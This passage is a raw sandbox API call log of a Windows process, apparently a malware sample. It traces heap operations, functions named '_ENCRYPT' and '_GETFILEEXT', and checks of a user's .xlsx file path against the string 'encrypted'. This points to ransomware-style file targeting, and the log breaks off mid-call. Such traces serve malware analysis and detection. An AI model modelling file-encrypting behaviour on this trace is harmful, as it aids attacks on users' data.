[0036.811] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896b8 | out: hHeap=0x770000) returned 1 [0036.811] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc58 | out: hHeap=0x770000) returned 1 [0036.811] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0036.811] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0036.811] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cce8 | out: hHeap=0x770000) returned 1 [0036.811] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0036.811] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c910 | out: hHeap=0x770000) returned 1 [0036.811] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c730 | out: hHeap=0x770000) returned 1 [0036.811] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0036.811] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891f0 | out: hHeap=0x770000) returned 1 [0036.811] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc88 | out: hHeap=0x770000) returned 1 [0036.811] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccb8 | out: hHeap=0x770000) returned 1 [0036.811] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0036.811] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0036.811] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd18 | out: hHeap=0x770000) returned 1 [0036.812] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdf0 | out: hHeap=0x770000) returned 1 [0036.812] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0036.812] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c868 | out: hHeap=0x770000) returned 1 [0036.812] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0036.812] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0036.812] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb20 | out: hHeap=0x770000) returned 1 [0036.812] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889538 | out: hHeap=0x770000) returned 1 [0036.812] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce80 | out: hHeap=0x770000) returned 1 [0036.812] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889aa8 | out: hHeap=0x770000) returned 1 [0036.812] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899d0 | out: hHeap=0x770000) returned 1 [0036.812] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5c40 | out: hHeap=0x770000) returned 1 [0036.812] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0036.812] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0ce8 [0036.812] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0036.812] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0036.812] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889aa8 [0036.812] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0036.812] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0036.812] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0036.812] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0036.812] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0036.812] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0036.812] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0036.812] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0036.812] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0036.812] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0036.812] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0036.812] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0036.812] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0036.812] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2080 [0036.812] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0036.812] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14e0 [0036.812] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce80 [0036.813] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0036.813] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889538 [0036.813] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0036.813] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb20 [0036.813] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0036.813] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898c8 [0036.813] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0036.813] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0036.813] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0036.813] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c868 [0036.813] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0036.813] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0036.813] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0036.813] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdf0 [0036.813] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0036.813] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd18 [0036.813] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0036.813] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0036.813] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0036.813] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0036.813] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0036.813] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0036.813] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0036.813] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897c0 [0036.813] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0036.813] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0036.813] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccb8 [0036.813] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0036.813] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0036.813] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccb8 | out: hHeap=0x770000) returned 1 [0036.813] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0036.813] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b12b0 [0036.813] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0036.814] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccb8 [0036.814] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0036.814] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0036.814] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897c0 [0036.814] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccb8 | out: hHeap=0x770000) returned 1 [0036.814] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0036.814] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0036.814] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0036.814] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0036.814] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897c0 [0036.814] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0036.814] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0036.814] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88ccb8 [0036.814] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x88ccb8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0036.814] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccb8 | out: hHeap=0x770000) returned 1 [0036.814] GetProcAddress (hModule=0x76e10000, lpProcName="CloseHandle") returned 0x76e21410 [0036.814] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0036.814] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0036.814] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0c70 [0036.814] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0036.814] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0036.814] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0036.814] CloseHandle (hObject=0x140) returned 1 [0036.814] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0036.815] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b8158 [0036.815] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0036.815] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897c0 [0036.815] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccb8 [0036.815] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0036.815] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0036.815] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc88 | out: hHeap=0x770000) returned 1 [0036.815] FreeLibrary (hLibModule=0x76e10000) returned 1 [0036.815] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0036.815] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0036.815] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0036.815] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccb8 [0036.815] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0036.815] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0036.815] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af438 [0036.815] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1508 [0036.815] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0036.815] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0036.815] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5a8 [0036.815] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0036.815] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13f0 [0036.815] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0036.815] PeekMessageW (in: lpMsg=0x6aea94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea94) returned 0 [0036.815] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af478 [0036.815] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="x", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0036.815] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0036.815] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="lsx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0036.816] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xlsx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0036.816] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".xlsx", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0036.816] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0036.816] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0036.816] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0036.816] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\pMd_CmUNe5hcq1EzK.xlsx", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6746d0c0, ftCreationTime.dwHighDateTime=0x1d57fb5, ftLastAccessTime.dwLowDateTime=0x573ff8b0, ftLastAccessTime.dwHighDateTime=0x1d5b0bf, ftLastWriteTime.dwLowDateTime=0x573ff8b0, ftLastWriteTime.dwHighDateTime=0x1d5b0bf, nFileSizeHigh=0x0, nFileSizeLow=0x9ed1, dwReserved0=0x0, dwReserved1=0x777648, cFileName="pMd_CmUNe5hcq1EzK.xlsx", cAlternateFileName="PMD_CM~1.XLS")) returned 0x7c20c0 [0036.816] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0036.816] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0036.816] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\pMd_CmUNe5hcq1EzK.xlsx", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6746d0c0, ftCreationTime.dwHighDateTime=0x1d57fb5, ftLastAccessTime.dwLowDateTime=0x573ff8b0, ftLastAccessTime.dwHighDateTime=0x1d5b0bf, ftLastWriteTime.dwLowDateTime=0x573ff8b0, ftLastWriteTime.dwHighDateTime=0x1d5b0bf, nFileSizeHigh=0x0, nFileSizeLow=0x9ed1, dwReserved0=0x0, dwReserved1=0x777648, cFileName="pMd_CmUNe5hcq1EzK.xlsx", cAlternateFileName="PMD_CM~1.XLS")) returned 0x7c20c0 [0036.816] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0036.816] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0036.816] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\pMd_CmUNe5hcq1EzK.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0036.816] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\pMd_CmUNe5hcq1EzK.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0036.816] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\pMd_CmUNe5hcq1EzK.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0036.816] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\pMd_CmUNe5hcq1EzK.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0036.816] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Documents\\pMd_CmUNe5hcq1EzK.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.816] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Documents\\pMd_CmUNe5hcq1EzK.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.816] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Documents\\pMd_CmUNe5hcq1EzK.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.816] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Documents\\pMd_CmUNe5hcq1EzK.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.816] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Documents\\pMd_CmUNe5hcq1EzK.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.816] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Documents\\pMd_CmUNe5hcq1EzK.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0036.816] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Documents\\pMd_CmUNe5hcq1EzK.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0036.817] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Documents\\pMd_CmUNe5hcq1EzK.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.817] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Documents\\pMd_CmUNe5hcq1EzK.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0036.817] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Documents\\pMd_CmUNe5hcq1EzK.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.817] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Documents\\pMd_CmUNe5hcq1EzK.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.817] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Documents\\pMd_CmUNe5hcq1EzK.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.817] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Documents\\pMd_CmUNe5hcq1EzK.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.817] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Documents\\pMd_CmUNe5hcq1EzK.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.817] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Documents\\pMd_CmUNe5hcq1EzK.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0036.817] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Documents\\pMd_CmUNe5hcq1EzK.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.817] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Documents\\pMd_CmUNe5hcq1EzK.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.817] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Documents\\pMd_CmUNe5hcq1EzK.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0036.817] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Documents\\pMd_CmUNe5hcq1EzK.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.817] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Documents\\pMd_CmUNe5hcq1EzK.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0036.817] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Documents\\pMd_CmUNe5hcq1EzK.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.817] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Documents\\pMd_CmUNe5hcq1EzK.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.817] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Documents\\pMd_CmUNe5hcq1EzK.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.817] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Documents\\pMd_CmUNe5hcq1EzK.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0036.817] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Documents\\pMd_CmUNe5hcq1EzK.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.817] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Documents\\pMd_CmUNe5hcq1EzK.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.817] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Documents\\pMd_CmUNe5hcq1EzK.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0036.817] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Documents\\pMd_CmUNe5hcq1EzK.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0036.817] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ocuments\\pMd_CmUNe5hcq1EzK.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.817] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cuments\\pMd_CmUNe5hcq1EzK.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0036.817] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="uments\\pMd_CmUNe5hcq1EzK.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.817] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ments\\pMd_CmUNe5hcq1EzK.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.817] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ents\\pMd_CmUNe5hcq1EzK.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.817] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="nts\\pMd_CmUNe5hcq1EzK.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.817] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ts\\pMd_CmUNe5hcq1EzK.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.817] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\pMd_CmUNe5hcq1EzK.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.817] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\pMd_CmUNe5hcq1EzK.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0036.817] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pMd_CmUNe5hcq1EzK.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.817] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Md_CmUNe5hcq1EzK.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.817] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="d_CmUNe5hcq1EzK.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0036.817] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="_CmUNe5hcq1EzK.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0036.817] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CmUNe5hcq1EzK.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0036.817] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mUNe5hcq1EzK.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.818] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="UNe5hcq1EzK.xlsx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.818] CompareStringW (Locale=0x400, dwCmpFlags=0x1, 